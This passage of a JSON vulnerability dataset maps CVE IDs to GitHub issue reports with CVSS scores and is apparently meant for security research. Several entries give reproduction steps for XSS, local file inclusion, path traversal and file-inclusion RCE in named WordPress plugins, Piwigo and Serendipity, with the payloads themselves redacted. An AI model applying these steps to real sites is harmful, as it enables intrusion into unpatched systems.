std::char_traits APITAG , std::allocator APITAG > const&, int, int, int&, int&) PATHTAG NUMBERTAG da2 in QPDF::resolve(int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG , int, int) PATHTAG NUMBERTAG a NUMBERTAG e7 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ca in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, int, int, bool) PATHTAG",
  997. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  998. "severity": "MEDIUM",
  999. "baseScore": 5.5,
  1000. "impactScore": 3.6,
  1001. "exploitabilityScore": 1.8
  1002. },
  1003. {
  1004. "CVE_ID": "CVE-2015-9260",
  1005. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/8",
  1006. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/8",
  1007. "Repo_new": "cybersecurityworks/disclosed",
  1008. "Issue_Created_At": "2015-10-14T12:17:01Z",
  1009. "description": "Bedita CMS NUMBERTAG Publication Module Bug Report. Details ================ Bedita CMS NUMBERTAG Publication Module Bug Report Bug Name: XSS APITAG Site Scripting) Version NUMBERTAG Last Updated: PATHTAG Homepage: FILETAG Severity High Description: XSS vulnerability in Bedita CMS NUMBERTAG Publication module Proof of concept: (POC) ================== Issue: POST request URL URLTAG of Bedita CMS NUMBERTAG is vulnerable to Cross Site Scripting (XSS) FILETAG Figure NUMBERTAG SS Payload injected in the given URL URLTAG is reflected back in the response FILETAG Figure NUMBERTAG SS Payload gets executed in the browser APITAG by: APITAG Arjun Basnet from APITAG Cyber Security Works Pvt Ltd APITAG",
  1010. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  1011. "severity": "MEDIUM",
  1012. "baseScore": 5.4,
  1013. "impactScore": 2.7,
  1014. "exploitabilityScore": 2.3
  1015. },
  1016. {
  1017. "CVE_ID": "CVE-2015-9260",
  1018. "Issue_Url_old": "https://github.com/bedita/bedita/issues/755",
  1019. "Issue_Url_new": "https://github.com/bedita/bedita/issues/755",
  1020. "Repo_new": "bedita/bedita",
  1021. "Issue_Created_At": "2015-10-14T12:19:59Z",
  1022. "description": "Bedita CMS NUMBERTAG Publication Module Bug Report. Hi Team: please find the detail report link below URLTAG",
  1023. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  1024. "severity": "MEDIUM",
  1025. "baseScore": 5.4,
  1026. "impactScore": 2.7,
  1027. "exploitabilityScore": 2.3
  1028. },
  1029. {
  1030. "CVE_ID": "CVE-2015-9282",
  1031. "Issue_Url_old": "https://github.com/grafana/grafana/issues/4117",
  1032. "Issue_Url_new": "https://github.com/grafana/grafana/issues/4117",
  1033. "Repo_new": "grafana/grafana",
  1034. "Issue_Created_At": "2016-02-22T18:46:37Z",
  1035. "description": "XSS: Option to disable and / or sanitize html in text panels. Text panels can contain any html and therefore pose an XSS security problem. Grafana should come with a backend option to disable and or sanitize html in text panels.",
  1036. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1037. "severity": "MEDIUM",
  1038. "baseScore": 6.1,
  1039. "impactScore": 2.7,
  1040. "exploitabilityScore": 2.8
  1041. },
  1042. {
  1043. "CVE_ID": "CVE-2015-9282",
  1044. "Issue_Url_old": "https://github.com/grafana/piechart-panel/issues/3",
  1045. "Issue_Url_new": "https://github.com/grafana/piechart-panel/issues/3",
  1046. "Repo_new": "grafana/piechart-panel",
  1047. "Issue_Created_At": "2015-12-20T17:06:23Z",
  1048. "description": "XSS in piechart legend. Applies to every type of legend On Graph, Table and Right side. FILETAG",
  1049. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1050. "severity": "MEDIUM",
  1051. "baseScore": 6.1,
  1052. "impactScore": 2.7,
  1053. "exploitabilityScore": 2.8
  1054. },
  1055. {
  1056. "CVE_ID": "CVE-2015-9284",
  1057. "Issue_Url_old": "https://github.com/omniauth/omniauth/issues/1031",
  1058. "Issue_Url_new": "https://github.com/omniauth/omniauth/issues/1031",
  1059. "Repo_new": "omniauth/omniauth",
  1060. "Issue_Created_At": "2021-02-01T10:28:11Z",
  1061. "description": "APITAG CVE NUMBERTAG needs to be adapted for APITAG NUMBERTAG Configuration Provider Gem: APITAG Ruby Version: APITAG Framework: APITAG Platform: APITAG Expected Behavior Back when using APITAG NUMBERTAG I had written CVETAG non regression tests as instructed URLTAG . One test asserts that APITAG is raised when making a POST request without CSRF token. I expected this test to continue passing after upgrading, or finding instructions in the release notes on how it should be adapted after upgrading to APITAG NUMBERTAG Actual Behavior After upgrading to APITAG NUMBERTAG this test fails as no exception is caught. However the log shows that the exception was indeed raised: APITAG ERRORTAG APITAG To my understanding, the cause is that APITAG now catches the exception and sends it URLTAG to its APITAG . How should the test be adapted? Steps to Reproduce Install omniauth NUMBERTAG omniauth rails_csrf_protection NUMBERTAG copy and run the test linked URLTAG from the Wiki ( direct link URLTAG .",
  1062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  1063. "severity": "HIGH",
  1064. "baseScore": 8.8,
  1065. "impactScore": 5.9,
  1066. "exploitabilityScore": 2.8
  1067. },
  1068. {
  1069. "CVE_ID": "CVE-2015-9285",
  1070. "Issue_Url_old": "https://github.com/esotalk/esoTalk/issues/444",
  1071. "Issue_Url_new": "https://github.com/esotalk/esotalk/issues/444",
  1072. "Repo_new": "esotalk/esotalk",
  1073. "Issue_Created_At": "2015-12-30T06:59:49Z",
  1074. "description": "Cross site scripting vulnerability. Hello, Cross site scripting vulnerability has been announced in (full disclosure mailing list)[ URLTAG According to this Curesec advisory timeline they were unable to contact you: APITAG Issue can be reproduced with following URL: ERRORTAG Do you have plans to fix this security vulnerability? If you do not plan to fix vulnerabilities in APITAG please mention it in the README or similar, thank you. As far as I can tell this issue does not yet have CVE identifier assigned. Have you request it?",
  1075. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1076. "severity": "MEDIUM",
  1077. "baseScore": 6.1,
  1078. "impactScore": 2.7,
  1079. "exploitabilityScore": 2.8
  1080. },
  1081. {
  1082. "CVE_ID": "CVE-2015-9410",
  1083. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/7",
  1084. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/7",
  1085. "Repo_new": "cybersecurityworks/disclosed",
  1086. "Issue_Created_At": "2015-09-14T11:48:53Z",
  1087. "description": "XSS Vulnerability in Blubrry APITAG Podcasting plugin Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name Malicious File upload Software: Blubrry APITAG Podcasting plugin Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: Malicious File upload vulnerability in APITAG plugin APITAG Gallery Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. FILETAG and modify the value of tab variable with APITAG payload and send the request to the server. Now, the added XSS payload will be echoed back from the server without validating the input. It also affects FILETAG file, $table_prefix and corrupts the database connectivity. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The Post Request APITAG tab APITAG variable in the URL FILETAG is vulnerable to Cross Site Scripting (XSS) FILETAG APITAG NUMBERTAG APITAG Invalid HTTP script Request sent to the server through the vulnerable APITAG tab APITAG variable in the URL FILETAG and its echoed back in the HTTP Response without validation. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the value of tab variable in Blubrry APITAG Version NUMBERTAG Fill all the variables with APITAG payload and send the request to the server NUMBERTAG Now, the added XSS payload will be echoed back from the server without validating the input even after FILETAG file has been configured with XSS filter settings. APITAG APITAG NUMBERTAG Discovered in Blubrry APITAG Podcasting plugin NUMBERTAG ersion NUMBERTAG Reported to EMAILTAG rg NUMBERTAG endor Responded, APITAG you for reporting this plugin. We're looking into it right now NUMBERTAG Fixed in Blubrry APITAG Podcasting plugin NUMBERTAG ersion. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  1088. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  1089. "severity": "MEDIUM",
  1090. "baseScore": 5.4,
  1091. "impactScore": 2.7,
  1092. "exploitabilityScore": 2.3
  1093. },
  1094. {
  1095. "CVE_ID": "CVE-2015-9478",
  1096. "Issue_Url_old": "https://github.com/scaron/prettyphoto/issues/149",
  1097. "Issue_Url_new": "https://github.com/scaron/prettyphoto/issues/149",
  1098. "Repo_new": "scaron/prettyphoto",
  1099. "Issue_Created_At": "2015-05-05T10:28:15Z",
  1100. "description": "any eta on xss fix. Someone reported an XSS vector in NUMBERTAG FILETAG",
  1101. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1102. "severity": "MEDIUM",
  1103. "baseScore": 6.1,
  1104. "impactScore": 2.7,
  1105. "exploitabilityScore": 2.8
  1106. },
  1107. {
  1108. "CVE_ID": "CVE-2015-9538",
  1109. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/2",
  1110. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/2",
  1111. "Repo_new": "cybersecurityworks/disclosed",
  1112. "Issue_Created_At": "2015-08-28T11:58:55Z",
  1113. "description": "Local File Inclusion (LFI). Word Press Product Bugs Report Bug Name LFI APITAG File Inclusion) Area Path APITAG Gallery by Photocrati Version NUMBERTAG APITAG Last Updated NUMBERTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Reported by sathish Cyber Security Works APITAG The existed filter name with Local File Inclusion (LFI) payload is executing when the user tries to modify the File path with LFI Payload & sent to the server. POC: FILETAG Figure NUMBERTAG HTTP Request & Response for the vulnerable dir variable with PATHTAG APITAG traversal) payload Note: Similarly, The user can fetch any details from any website hosted in the same server. Reproducing Steps NUMBERTAG Logon into the application NUMBERTAG Access APITAG Gallery by Photocrati Plugin NUMBERTAG Click on the path selection on the given folders NUMBERTAG Modify dir variable value with PATHTAG APITAG traversal) payload in the intercepting proxy NUMBERTAG Now You can see the internal available system folders",
  1114. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  1115. "severity": "MEDIUM",
  1116. "baseScore": 6.5,
  1117. "impactScore": 3.6,
  1118. "exploitabilityScore": 2.8
  1119. },
  1120. {
  1121. "CVE_ID": "CVE-2015-9539",
  1122. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/4",
  1123. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/4",
  1124. "Repo_new": "cybersecurityworks/disclosed",
  1125. "Issue_Created_At": "2015-09-14T10:50:07Z",
  1126. "description": "XSS Vulnerability in Fast Secure Contact form version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name XSS APITAG Site Scripting) Software: Fast Secure Contact Form plugin Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Description: XSS vulnerability in APITAG plugin Fast Secure Contact Form Changelog: URLTAG Proof of concept ================ Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload injected to fs_contact_form1 FILETAG APITAG NUMBERTAG APITAG XSS Payload executed in the browser whenever the user views it. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (localhost or public host NUMBERTAG Modifying the variable fs_contact_form1[welcome] in Fast Secure Contact Form NUMBERTAG recently updated version) in the URL URLTAG NUMBERTAG Fill all the variables with APITAG payload and save it to view further NUMBERTAG Now, the added XSS payload will be executed whenever the user reviews it. APITAG APITAG NUMBERTAG Discovered in Fast Secure Contact Form plugin NUMBERTAG ersion NUMBERTAG Reported to WP Plugin NUMBERTAG WP Plugin responded, APITAG you for reporting this plugin. We're looking into it right now NUMBERTAG Fixed in NUMBERTAG ersion of Fast Secure Contact Form plugin APITAG by: APITAG Sathish from Cyber Security Works Pvt Ltd",
  1127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1128. "severity": "MEDIUM",
  1129. "baseScore": 6.1,
  1130. "impactScore": 2.7,
  1131. "exploitabilityScore": 2.8
  1132. },
  1133. {
  1134. "CVE_ID": "CVE-2015-9544",
  1135. "Issue_Url_old": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17",
  1136. "Issue_Url_new": "https://github.com/ofirdagan/cross-domain-local-storage/issues/17",
  1137. "Repo_new": "ofirdagan/cross-domain-local-storage",
  1138. "Issue_Created_At": "2015-08-13T00:40:18Z",
  1139. "description": "Restricting domain by origins. There doesn't appear to be a programmatic way to define a whitelist of origins that the iframe will accept requests from. This is something that's recommended by the APITAG (API documentation)[ URLTAG It suggests that the receiver of function should \"always verify the sender's identity\".",
  1140. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
  1141. "severity": "HIGH",
  1142. "baseScore": 7.1,
  1143. "impactScore": 5.2,
  1144. "exploitabilityScore": 1.8
  1145. },
  1146. {
  1147. "CVE_ID": "CVE-2015-9549",
  1148. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/11",
  1149. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/11",
  1150. "Repo_new": "cybersecurityworks/disclosed",
  1151. "Issue_Created_At": "2015-11-13T06:56:27Z",
  1152. "description": "APITAG CMS NUMBERTAG POC. As per the documentation of the Ocportal, a value in a template that is not meant to contain HTML is marked as an escaped value ({VALUE }). This meant that \u2018html entities\u2019 are put in replacement of HTML control characters. FILETAG FILETAG Here the VALUE that is marked with symbol will be filtered with the XSS filter and it will be sanitized before displaying it to the user. But they forgot to mark FIELD_NAME in OCF_EMOTICON_CELL.tpl file. PATHTAG FILETAG The View_all link besides the emoticons in the following screen is having this FIELD_NAME variable FILETAG The View_all link is sending the following GET request to the server FILETAG The following is the source code of FILETAG file PATHTAG FILETAG The following is the code related to emoticons_script function in FILETAG file PATHTAG FILETAG Code that is loading the template file with the user entered input PATHTAG FILETAG This code is reading the GET request parameter field_name and displaying it back to the user without filtering because of the variable is not marked with symbol. Obviously it won\u2019t go for any filtration. GET request to FILETAG with script vector as value of field_name FILETAG And the inserted payload is reflecting back to the user as shown in the following screen. FILETAG",
  1153. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1154. "severity": "MEDIUM",
  1155. "baseScore": 6.1,
  1156. "impactScore": 2.7,
  1157. "exploitabilityScore": 2.8
  1158. },
  1159. {
  1160. "CVE_ID": "CVE-2016-1000027",
  1161. "Issue_Url_old": "https://github.com/spring-projects/spring-framework/issues/24434",
  1162. "Issue_Url_new": "https://github.com/spring-projects/spring-framework/issues/24434",
  1163. "Repo_new": "spring-projects/spring-framework",
  1164. "Issue_Created_At": "2020-01-27T06:46:04Z",
  1165. "description": "Sonartype vulnerability CVETAG in Spring web project. Affects NUMBERTAG RELEASE Issue Title : Sonartype vulnerability CVETAG in Spring web project Description Description from CVE Pivotal Spring Framework NUMBERTAG suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. Explanation The APITAG web package is vulnerable to deserialization of untrusted data leading to Remote Code Execution (RCE). The APITAG method in APITAG does not properly verify or restrict untrusted objects prior to deserializing them. An attacker can exploit this vulnerability by sending malicious requests containing crafted objects, which when deserialized, execute arbitrary code on the vulnerable system. NOTE: This vulnerability is related to a previously reported deserialization vulnerability ( CVETAG ) within the package, impacting a different class. Detection The application is vulnerable by using this component under specific scenarios as listed out in the advisory. Reference: URLTAG Recommendation There is no non vulnerable upgrade path for this component/package. We recommend investigating alternative components or a potential mitigating control. A warning has been provided in the official Javadocs of the APITAG class: \"WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.\" The developer's general advice also states: \"Do not use Java serialization for external endpoints, in particular not for unauthorized ones. HTTP invoker is not a well kept secret (or an \"oversight\") but rather the typical case of how a Spring application would expose serialization endpoints to begin with... he has a point that we should make this case all across our documentation, including the javadoc. But I don't really see a CVE case here, just a documentation improvement. Pivoltal will enhance their documentation for the NUMBERTAG and NUMBERTAG releases.\" Reference: URLTAG Root Cause FILETAG <= PATHTAG NUMBERTAG Advisories Third Party: CVETAG Third Party: URLTAG CVSS Details CVE CVSS NUMBERTAG CVSS Vector: PATHTAG",
  1166. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1167. "severity": "CRITICAL",
  1168. "baseScore": 9.8,
  1169. "impactScore": 5.9,
  1170. "exploitabilityScore": 3.9
  1171. },
  1172. {
  1173. "CVE_ID": "CVE-2016-10006",
  1174. "Issue_Url_old": "https://github.com/nahsra/antisamy/issues/2",
  1175. "Issue_Url_new": "https://github.com/nahsra/antisamy/issues/2",
  1176. "Repo_new": "nahsra/antisamy",
  1177. "Issue_Created_At": "2016-12-18T16:14:54Z",
  1178. "description": "Style validation in attributes isn't properly handled. Privately reported issue.",
  1179. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1180. "severity": "MEDIUM",
  1181. "baseScore": 6.1,
  1182. "impactScore": 2.7,
  1183. "exploitabilityScore": 2.8
  1184. },
  1185. {
  1186. "CVE_ID": "CVE-2016-10060",
  1187. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/196",
  1188. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/196",
  1189. "Repo_new": "imagemagick/imagemagick",
  1190. "Issue_Created_At": "2016-05-06T18:04:21Z",
  1191. "description": "Completion of error handling. Would you like to add more error handling for return values from functions like the following? fputc]( FILETAG APITAG a byte on a stream\") \u21d2 APITAG URLTAG fwrite]( FILETAG APITAG output\") \u21d2 APITAG URLTAG",
  1192. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  1193. "severity": "MEDIUM",
  1194. "baseScore": 6.5,
  1195. "impactScore": 3.6,
  1196. "exploitabilityScore": 2.8
  1197. },
  1198. {
  1199. "CVE_ID": "CVE-2016-10065",
  1200. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/129",
  1201. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/129",
  1202. "Repo_new": "imagemagick/imagemagick",
  1203. "Issue_Created_At": "2016-02-12T22:31:09Z",
  1204. "description": "out of bounds read in APITAG CVETAG",
  1205. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  1206. "severity": "HIGH",
  1207. "baseScore": 7.8,
  1208. "impactScore": 5.9,
  1209. "exploitabilityScore": 1.8
  1210. },
  1211. {
  1212. "CVE_ID": "CVE-2016-10075",
  1213. "Issue_Url_old": "https://github.com/tqdm/tqdm/issues/328",
  1214. "Issue_Url_new": "https://github.com/tqdm/tqdm/issues/328",
  1215. "Repo_new": "tqdm/tqdm",
  1216. "Issue_Created_At": "2016-12-25T20:36:17Z",
  1217. "description": "APITAG insecure use of git. When you import tqdm , the APITAG module executes the following command: APITAG This was meant to check if the user is running a pre release version of tqdm. But most of the time there's no git repo at all, so this is just waste of time. Worse, the current working directory might be a part of an unrelated git repository, possibly a malicious one. At least with git NUMBERTAG or later, it's possible to craft a repo in which git log executes arbitrary code: CODETAG",
  1218. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  1219. "severity": "HIGH",
  1220. "baseScore": 7.8,
  1221. "impactScore": 5.9,
  1222. "exploitabilityScore": 1.8
  1223. },
  1224. {
  1225. "CVE_ID": "CVE-2016-10082",
  1226. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/433",
  1227. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/433",
  1228. "Repo_new": "s9y/serendipity",
  1229. "Issue_Created_At": "2016-12-18T23:58:36Z",
  1230. "description": "File Inclusion Attack Possible RCE. Hello, In FILETAG NUMBERTAG APITAG = APITAG NUMBERTAG include_once (S9Y_INCLUDE_PATH . PATHTAG ); As you can see a user controlled variable, APITAG is being sent to an APITAG function without a call, which results in file inclusion and a remote code execution by refering to any file with php payload in older PHP versions where nullbytes NUMBERTAG are allowed. Thanks,",
  1231. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1232. "severity": "CRITICAL",
  1233. "baseScore": 9.8,
  1234. "impactScore": 5.9,
  1235. "exploitabilityScore": 3.9
  1236. },
  1237. {
  1238. "CVE_ID": "CVE-2016-10083",
  1239. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/575",
  1240. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/575",
  1241. "Repo_new": "piwigo/piwigo",
  1242. "Issue_Created_At": "2016-12-18T23:40:33Z",
  1243. "description": "Cross Site Scripting. In PATHTAG CODETAG As you can see a user controlled input $_GET['section'] ($filename) is being sent to APITAG printing out without no sanitization, this could result in cross site scripting because APITAG prints out content just like APITAG before exit. Fix: do htmlentities($filename);",
  1244. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  1245. "severity": "MEDIUM",
  1246. "baseScore": 6.1,
  1247. "impactScore": 2.7,
  1248. "exploitabilityScore": 2.8
  1249. },
  1250. {
  1251. "CVE_ID": "CVE-2016-10084",
  1252. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/572",
  1253. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/572",
  1254. "Repo_new": "piwigo/piwigo",
  1255. "Issue_Created_At": "2016-12-18T23:29:28Z",
  1256. "description": "File Inclusion Attack. Hello, There is a File Inclusion attack in the file PATHTAG It does: CODETAG The user controlled variable $page['tab'] is being sent to an APITAG without no checks. this will create file inclusion attacks possible. in older php versions, using a nullbyte attack, a code execution is also possible. Fix: put an array of allowed strings. Thanks,",
  1257. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  1258. "severity": "HIGH",
  1259. "baseScore": 7.2,
  1260. "impactScore": 5.9,
  1261. "exploitabilityScore": 1.2
  1262. },
  1263. {
  1264. "CVE_ID": "CVE-2016-10085",
  1265. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/573",
  1266. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/573",
  1267. "Repo_new": "piwigo/piwigo",
  1268. "Issue_Created_At": "2016-12-18T23:32:41Z",
  1269. "description": "File Inclusion Attack NUMBERTAG There is a File Inclusion attack in the file PATHTAG APITAG A user controlled variable is being sent straight to APITAG this should have checks for allowed strings before that. Thanks,",
  1270. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  1271. "severity": "HIGH",
  1272. "baseScore": 7.2,
  1273. "impactScore": 5.9,
  1274. "exploitabilityScore": 1.2
  1275. },
  1276. {
  1277. "CVE_ID": "CVE-2016-10096",
  1278. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/58",
  1279. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/58",
  1280. "Repo_new": "semplon/genixcms",
  1281. "Issue_Created_At": "2016-03-22T16:38:55Z",
  1282. "description": "a security issues FILETAG for more details. Thanks",
  1283. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  1284. "severity": "HIGH",
  1285. "baseScore": 7.3,
  1286. "impactScore": 3.4,
  1287. "exploitabilityScore": 3.9
  1288. },
  1289. {
  1290. "CVE_ID": "CVE-2016-10105",
  1291. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/574",
  1292. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/574",
  1293. "Repo_new": "piwigo/piwigo",
  1294. "Issue_Created_At": "2016-12-18T23:38:12Z",
  1295. "description": "File Inclusion with Possible RCE. In PATHTAG NUMBERTAG sections = explode('/', $_GET['section NUMBERTAG filename = PHPWG_PLUGINS_PATH . implode('/', $sections NUMBERTAG if(is_file($filename NUMBERTAG include_once ($filename); As you can see, a user controlled variable is being sent stright to APITAG a person who managed to upload a .jpg file or any other content with PHP paylaod will just need to refer to that location and APITAG will execute it, making a code execution possible.",
  1296. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1297. "severity": "CRITICAL",
  1298. "baseScore": 9.8,
  1299. "impactScore": 5.9,
  1300. "exploitabilityScore": 3.9
  1301. },
  1302. {
  1303. "CVE_ID": "CVE-2016-10127",
  1304. "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/366",
  1305. "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/366",
  1306. "Repo_new": "identitypython/pysaml2",
  1307. "Issue_Created_At": "2016-10-06T15:50:31Z",
  1308. "description": "APITAG vulnerable to XXE. Roland ( APITAG Description An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. It seams that the APITAG library does not contemplate the possibility of SAML \"XML\" requests or responses containing External Entities or File Local inclusion resulting on malicious XML requests or responses being able to trigger an XXE attack. Proof of Concept APITAG APITAG For more information refer to: URLTAG URLTAG Recommendations: It is my recommendation that you should disable all these by default and if necessary give the user the option to enable them on their settings.",
  1309. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  1310. "severity": "CRITICAL",
  1311. "baseScore": 9.0,
  1312. "impactScore": 6.0,
  1313. "exploitabilityScore": 2.3
  1314. },
  1315. {
  1316. "CVE_ID": "CVE-2016-10131",
  1317. "Issue_Url_old": "https://github.com/bcit-ci/CodeIgniter/issues/4963",
  1318. "Issue_Url_new": "https://github.com/bcit-ci/codeigniter/issues/4963",
  1319. "Repo_new": "bcit-ci/codeigniter",
  1320. "Issue_Created_At": "2016-12-26T17:22:08Z",
  1321. "description": "APITAG A critical vulnerability. Please read: FILETAG Please update: PATHTAG",
  1322. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  1323. "severity": "CRITICAL",
  1324. "baseScore": 9.8,
  1325. "impactScore": 5.9,
  1326. "exploitabilityScore": 3.9
  1327. },
  1328. {
  1329. "CVE_ID": "CVE-2016-10168",
  1330. "Issue_Url_old": "https://github.com/libgd/libgd/issues/354",
  1331. "Issue_Url_new": "https://github.com/libgd/libgd/issues/354",
  1332. "Repo_new": "libgd/libgd",
  1333. "Issue_Created_At": "2016-12-16T17:07:50Z",
  1334. "description": "Signed Integer Overflow gd_io.c. My sample: ./gd2togif test_file /dev/null APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int'",
  1335. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  1336. "severity": "HIGH",
  1337. "baseScore": 7.8,
  1338. "impactScore": 5.9,
  1339. "exploitabilityScore": 1.8
  1340. },
  1341. {
  1342. "CVE_ID": "CVE-2016-10173",
  1343. "Issue_Url_old": "https://github.com/halostatue/minitar/issues/16",
  1344. "Issue_Url_new": "https://github.com/halostatue/minitar/issues/16",
  1345. "Repo_new": "halostatue/minitar",
  1346. "Issue_Created_At": "2016-08-22T20:08:00Z",
  1347. "description": "Minitar directory traversal vulnerability. Overview Minitar allows attackers to overwrite arbitrary files during archive extraction via a .. (dot dot) in an extracted filename. Proof of Concept CODETAG Desired behaviour: ERRORTAG Example how bsdtar handles this kind of issues: ___ o Archive entries can have absolute pathnames. By default, tar removes the leading / character from filenames before restoring them to guard against this problem. o Archive entries can have pathnames that include .. components. By default, tar will not extract files containing .. components in their pathname. o Archive entries can exploit symbolic links to restore files to other directories. An archive can restore a symbolic link to another directory, then use that link to restore a file into that directory. To guard against this, tar checks each extracted path for symlinks. If the final path element is a symlink, it will be removed and replaced with the archive entry. If U is specified, any intermediate symlink will also be unconditionally removed. If neither U nor P is specified, tar will refuse to extract the entry. ___ Vulnerable, verified versions of gems: APITAG Related issue: URLTAG",
  1348. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  1349. "severity": "HIGH",
  1350. "baseScore": 7.5,
  1351. "impactScore": 3.6,
  1352. "exploitabilityScore": 3.9
  1353. },
  1354. {
  1355. "CVE_ID": "CVE-2016-10193",
  1356. "Issue_Url_old": "https://github.com/dejan/espeak-ruby/issues/7",
  1357. "Issue_Url_new": "https://github.com/dejan/espeak-ruby/issues/7",
